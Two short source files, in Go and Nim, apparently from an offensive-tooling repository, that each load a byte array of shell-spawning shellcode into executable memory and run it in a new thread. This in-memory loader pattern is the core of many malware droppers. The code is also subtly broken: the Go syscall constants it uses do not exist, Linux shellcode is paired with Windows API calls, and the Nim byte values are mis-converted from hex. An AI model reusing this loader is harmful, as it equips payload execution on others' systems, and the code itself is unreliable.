File: shellc0de/shellcode-runner.go
package main

import (
	"fmt"
	"syscall"
	"unsafe"
)

func main() {
	// Define the shellcode as a byte array
	shellcode := []byte{0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x50, 0x89, 0xe2, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80}

	// Allocate memory for the shellcode
	memory, _, err := syscall.Syscall(syscall.SYS_VIRTUALALLOC, 0, uintptr(len(shellcode)), 0x3000, 0x40)
	if err != 0 {
		fmt.Println("Error allocating memory for shellcode: ", err)
		return
	}

	// Copy the shellcode into the allocated memory
	_, _, err = syscall.Syscall(syscall.SYS_RtlMoveMemory, memory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
	if err != 0 {
		fmt.Println("Error copying shellcode into allocated memory: ", err)
		return
	}

	// Create a thread to execute the shellcode
	shellcodeThread, _, err := syscall.Syscall6(syscall.SYS_CREATETHREAD, 0, 0, memory, 0, 0, 0)
	if err != 0 {
		fmt.Println("Error creating thread to execute shellcode: ", err)
		return
	}

	// Wait for the thread to finish
	_, _, err = syscall.Syscall6(syscall.SYS_WAITFORSINGLEOBJECT, shellcodeThread, 0xffffffff, 0, 0, 0)
	if err != 0 {
		fmt.Println("Error waiting for shellcode thread to finish: ", err)
		return
	}

	// Free the allocated memory
	_, _, err = syscall.Syscall(syscall.SYS_VIRTUALFREE, memory, 0, 0x8000)
	if err != 0 {
		fmt.Println("Error freeing allocated memory: ", err)
		return
	}
}

File: shellc0de/shellcode-runner.nim
import winim/lean

# Define the shellcode as a byte array
#Use shellcode to byte array using shellcode-2-byte.nim
let shellcode = [31, 0, 80, 104, 47, 47, 115, 104, 104, 47, 98, 105, 110, 137, 227, 80, 137, 226, 83, 137, 225, 176, 11, 205, 128]

# Allocate memory for the shellcode
let memory = VirtualAlloc(0, len(shellcode), 0x3000, 0x40)

# Copy the shellcode into the allocated memory
RtlMoveMemory(memory, @shellcode[0], len(shellcode))

# Create a thread to execute the shellcode
let shellcode_thread = CreateThread(0, 0, memory, 0, 0, addr 0)

# Wait for the thread to finish
WaitForSingleObject(shellcode_thread, -1)
